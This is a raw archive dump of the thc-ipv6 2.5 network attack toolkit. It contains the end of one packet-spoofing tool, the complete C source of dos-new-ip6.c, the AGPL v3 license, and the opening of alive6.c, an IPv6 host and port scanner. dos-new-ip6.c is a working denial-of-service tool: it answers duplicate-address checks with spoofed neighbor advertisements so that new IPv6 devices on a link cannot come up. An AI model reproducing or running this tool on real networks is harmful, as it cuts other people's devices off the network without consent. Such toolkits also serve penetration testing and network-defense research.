hdr.pkt_len = sndbuflen; while (1) { thc_pcap_check(p, (char *) intercept, NULL); usleep(100); if (passed <= time(NULL)) { if (thc_send_pkt(interface, (unsigned char*) &hdr, &sndbuflen) < 0) { fprintf(stderr, "Error: could not send packet to interface %s\n", interface); return -1; } passed = time(NULL) + 15; } } } else { thc_pcap_function(interface, "it does not matter what we put here", (char *) intercept, 1, NULL); fprintf(stderr, "Error: Could not set interface into promiscious mode\n"); exit(-1); } return -1; // never reached unless error } thc-ipv6-2.5/dos-new-ip6.c0000644000000000000000000000755412251022434013740 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned char *pkt = NULL, *dstmac, *dst, matchfoo[16]; int pkt_len = 0; thc_ipv6_hdr *ipv6; int mychecksum; char *interface; char *ptr3, *ptr4; int i; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface\n\n", prg); printf("This tools prevents new IPv6 interfaces to come up, by sending answers to\n"); printf("duplicate ip6 checks (DAD). This results in a DOS for new IPv6 devices.\n\n"); exit(-1); } void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14); int len = header->caplen - 14; if (do_hdr_size) { ipv6hdr = (unsigned char *) (data + do_hdr_size); len = header->caplen - do_hdr_size; if ((ipv6hdr[0] & 240) != 0x60) return; } if (debug) { printf("DEBUG: packet received\n"); thc_dump_data((unsigned char *) data, header->caplen, "Received Packet"); } if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_NEIGHBORSOL || header->caplen < 78) return; if (memcmp(matchfoo, ipv6hdr + 8, 16) != 0 && !(ipv6hdr[8] == 0xfe && ipv6hdr[48] != 0xfe)) return; if (debug) printf("DEBUG: packet is a valid duplicate ip6 check via icmp6 neighbor solitication\n"); memcpy(ipv6->pkt + 22, ipv6hdr + 48, 16); // copy target to srcip6 memcpy(ipv6->pkt + 62, ipv6hdr + 48, 16); // copy target to target mychecksum = checksum_pseudo_header(ipv6->pkt + 22, ipv6->pkt + 38, NXT_ICMP6, ipv6->pkt + 54, 32); ipv6->pkt[56] = mychecksum / 256; ipv6->pkt[57] = mychecksum % 256; thc_send_pkt(interface, pkt, &pkt_len); ptr4 = thc_ipv62notation(ipv6->pkt + 22); printf("Spoofed packet for existing ip6 as %s\n", ptr4); free(ptr4); if (fork() == 0) { usleep(200); debug = 0; thc_send_pkt(interface, pkt, &pkt_len); exit(0); } ipv6->pkt[56] = 0; ipv6->pkt[57] = 0; // new random mac for next duplicate check for (i = 2; i < 6; i++) ipv6->pkt[6 + i] = rand() % 256; memcpy(ipv6->pkt + 80, ipv6->pkt + 6, 6); (void) wait3(NULL, WNOHANG, NULL); return; } int main(int argc, char *argv[]) { char dummy[24]; unsigned char *ownmac; if (argc == 3 && strncmp(argv[1], "-d", 2) == 0) { argv++; argc--; debug = 1; } if (argc != 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (debug) printf("Preparing spoofed packet for speed-up\n"); interface = argv[1]; if ((ownmac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } memset(dummy, 'X', sizeof(dummy)); dummy[16] = 2; dummy[17] = 1; memcpy(&dummy[18], ownmac, 6); dst = thc_resolve6("ff02::1"); dstmac = thc_get_multicast_mac(dst); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, dummy, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, ICMP6_NEIGHBORADV_OVERRIDE, dummy, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, ownmac, dstmac, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; memset(ipv6->pkt + 56, 0, 2); // reset checksum to zero srand(time(NULL) + getpid()); for (i = 2; i < 6; i++) // set a random mac, keeping the first two bytes ipv6->pkt[6 + i] = rand() % 256; memcpy(ipv6->pkt + 80, ipv6->pkt + 6, 6); if (debug) { thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet"); printf("\n"); } memset(matchfoo, 0, sizeof(matchfoo)); printf("Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL); } thc-ipv6-2.5/LICENSE0000644000000000000000000010510212234222353012520 0ustar rootroot[see the end of the file for the special exception for linking with OpenSSL - debian people need this] GNU AFFERO GENERAL PUBLIC LICENSE Version 3, 19 November 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU Affero General Public License is a free, copyleft license for software and other kinds of works, specifically designed to ensure cooperation with the community in the case of network server software. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, our General Public Licenses are intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. Developers that use our General Public Licenses protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License which gives you legal permission to copy, distribute and/or modify the software. A secondary benefit of defending all users' freedom is that improvements made in alternate versions of the program, if they receive widespread use, become available for other developers to incorporate. Many developers of free software are heartened and encouraged by the resulting cooperation. However, in the case of software used on network servers, this result may fail to come about. The GNU General Public License permits making a modified version and letting the public access it on a server without ever releasing its source code to the public. The GNU Affero General Public License is designed specifically to ensure that, in such cases, the modified source code becomes available to the community. It requires the operator of a network server to provide the source code of the modified version running there to the users of that server. Therefore, public use of a modified version, on a publicly accessible server, gives the public access to the source code of the modified version. An older license, called the Affero General Public License and published by Affero, was designed to accomplish similar goals. This is a different license, not a version of the Affero GPL, but Affero has released a new version of the Affero GPL which permits relicensing under this license. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU Affero General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Remote Network Interaction; Use with the GNU General Public License. Notwithstanding any other provision of this License, if you modify the Program, your modified version must prominently offer all users interacting with it remotely through a computer network (if your version supports such interaction) an opportunity to receive the Corresponding Source of your version by providing access to the Corresponding Source from a network server at no charge, through some standard or customary means of facilitating copying of software. This Corresponding Source shall include the Corresponding Source for any work covered by version 3 of the GNU General Public License that is incorporated pursuant to the following paragraph. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the work with which it is combined will remain governed by version 3 of the GNU General Public License. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU Affero General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU Affero General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU Affero General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU Affero General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with this program. If not, see . Also add information on how to contact you by electronic and paper mail. If your software can interact with users remotely through a computer network, you should also make sure that it provides a way for users to get its source. For example, if your program is a web application, its interface could display a "Source" link that leads users to an archive of the code. There are many ways you could offer source, and different solutions will be better for different programs; see section 13 for the specific requirements. You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU AGPL, see . Special Exception * In addition, as a special exception, the copyright holders give * permission to link the code of portions of this program with the * OpenSSL library under certain conditions as described in each * individual source file, and distribute linked combinations * including the two. * You must obey the GNU Affero General Public License in all respects * for all of the code used other than OpenSSL. If you modify * file(s) with this exception, you may extend this exception to your * version of the file(s), but you are not obligated to do so. If you * do not wish to do so, delete this exception statement from your * version. If you delete this exception statement from all source * files in the program, then also delete it here. thc-ipv6-2.5/alive6.c0000644000000000000000000015030412254411513013051 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define MAX_ALIVE 65536 #define MAX_NETS 1024 #define MAX_VENDID 64 #define MAX_PORTS 256 #define MAX_FOUR 16 #define RESP_PONG "ICMP echo-reply" #define RESP_UNREACH_PORT "ICMP port unreachable" #define RESP_UNREACH_ROUTE "ICMP network unreachable" #define RESP_UNREACH_FW "ICMP firewalled unreachable" #define RESP_UNREACH_OOSCOPE "ICMP out of scope unreachable" #define RESP_UNREACH_ADDR "ICMP host unreachable" #define RESP_UNREACH_GRESS "ICMP ingress/egress filter unreachable" #define RESP_UNREACH_REJECT "ICMP route reject unreachable" #define RESP_TOOBIG "ICMP packet too big" #define RESP_TTLEXCEED "ICMP TTL exceeded" #define RESP_REDIR "ICMP local router traffic redirect" #define RESP_PARAMPROB "ICMP parameter problem" #define RESP_ERROR "ICMP error" #define RESP_UDP "UDP" #define RESP_SYNACK "TCP SYN-ACK" #define RESP_RST "TCP RST" #define RESP_ACK "TCP ACK" #define RESP_OTHER "TCP misc-options" #define RESP_UNKNOWN "unknown" unsigned char buf[8], *alive[MAX_ALIVE], *tagging = NULL; int alive_no = 0, resolve = 0, waittime = 1, rawmode = 0, portscan = 0, curr = 0, list = 0; int synports[MAX_PORTS], ackports[MAX_PORTS], udpports[MAX_PORTS]; int ndp_only = 0, do_ping = 1, do_dst = 1, do_hop = 0, verbose = 0, srcport = -1, do_help = 0, do_hopcount = 0, still_not_there = 0, rst_means_alive = 1; unsigned long int tcount = 0; FILE *out = NULL; struct hostent *he = NULL; short int si, sp, sp2; // all dict entries must start with a single from/to 0,0,0,0 // and end with a single from/to ffff,ffff,ffff,ffff unsigned short int dict[] = { 0, 0, 0, 0, /*to */ 0, 0, 0, 0, 0, 0, 0, 1, /*to */ 0, 0, 0, 0x2ff, // 1975 tests 0, 0, 0, 0x300, /*to */ 0, 0, 0, 0x305, 0, 0, 0, 0x400, /*to */ 0, 0, 0, 0x405, 0, 0, 0, 0x443, /*to */ 0, 0, 0, 0x445, 0, 0, 0, 0x500, /*to */ 0, 0, 0, 0x505, 0, 0, 0, 0x530, /*to */ 0, 0, 0, 0x53f, 0, 0, 0, 0x555, /*to */ 0, 0, 0, 0x555, 0, 0, 0, 0x600, /*to */ 0, 0, 0, 0x605, 0, 0, 0, 0x666, /*to */ 0, 0, 0, 0x667, 0, 0, 0, 0x700, /*to */ 0, 0, 0, 0x703, 0, 0, 0, 0x800, /*to */ 0, 0, 0, 0x803, 0, 0, 0, 0x900, /*to */ 0, 0, 0, 0x903, 0, 0, 0, 0xaaa, /*to */ 0, 0, 0, 0xaaa, 0, 0, 0, 0xc38, /*to */ 0, 0, 0, 0xc38, 0, 0, 0, 0x9dd, /*to */ 0, 0, 0, 0x9dd, 0, 0, 0, 0xff0, /*to */ 0, 0, 0, 0xfff, 0, 0, 0, 0x1000, /*to */ 0, 0, 0, 0x1111, 0, 0, 0, 0x1337, /*to */ 0, 0, 0, 0x1337, 0, 0, 0, 0x14e9, /*to */ 0, 0, 0, 0x14e9, 0, 0, 0, 0x1a0b, /*to */ 0, 0, 0, 0x1a0b, 0, 0, 0, 0x1f40, /*to */ 0, 0, 0, 0x1f40, 0, 0, 0, 0x1f90, /*to */ 0, 0, 0, 0x1f90, 0, 0, 0, 0x2000, /*to */ 0, 0, 0, 0x2111, 0, 0, 0, 0x3000, /*to */ 0, 0, 0, 0x3011, 0, 0, 0, 0x3128, /*to */ 0, 0, 0, 0x3128, 0, 0, 0, 0x2525, /*to */ 0, 0, 0, 0x2525, 0, 0, 0, 0x5353, /*to */ 0, 0, 0, 0x5353, 0, 0, 0, 0x6666, /*to */ 0, 0, 0, 0x6667, 0, 0, 0, 0x8000, /*to */ 0, 0, 0, 0x8000, 0, 0, 0, 0x8080, /*to */ 0, 0, 0, 0x8080, 0, 0, 0, 0xaaaa, /*to */ 0, 0, 0, 0xaaaa, 0, 0, 0, 0xabcd, /*to */ 0, 0, 0, 0xabcd, 0, 0, 0, 0xbabe, /*to */ 0, 0, 0, 0xbabe, 0, 0, 0, 0xbeef, /*to */ 0, 0, 0, 0xbeef, 0, 0, 0, 0xcafe, /*to */ 0, 0, 0, 0xcafe, 0, 0, 0, 0xc0de, /*to */ 0, 0, 0, 0xc0de, 0, 0, 0, 0xdead, /*to */ 0, 0, 0, 0xdead, 0, 0, 0, 0xf500, /*to */ 0, 0, 0, 0xf500, 0, 0, 0, 0xfeed, /*to */ 0, 0, 0, 0xfeed, 0, 0, 0, 0xfff0, /*to */ 0, 0, 0, 0xffff, 0, 0, 1, 0, /*to */ 0, 0, 1, 0x1ff, 0, 0, 2, 0, /*to */ 0, 0, 0x1bb, 5, 0, 0, 2, 0xa, /*to */ 0, 0, 2, 0x20, 0, 0, 2, 0x21, /*to */ 0, 0, 3, 0x21, 0, 0, 2, 0x22, /*to */ 0, 0, 3, 0x22, 0, 0, 2, 0x25, /*to */ 0, 0, 9, 0x25, 0, 0, 2, 0x50, /*to */ 0, 0, 9, 0x50, 0, 0, 2, 0x53, /*to */ 0, 0, 9, 0x53, 0, 0, 2, 0x80, /*to */ 0, 0, 9, 0x80, 0, 0, 2, 0x1bb, /*to */ 0, 0, 9, 0x1bb, 0, 0, 2, 0x500, /*to */ 0, 0, 9, 0x500, 0, 0, 2, 6, /*to 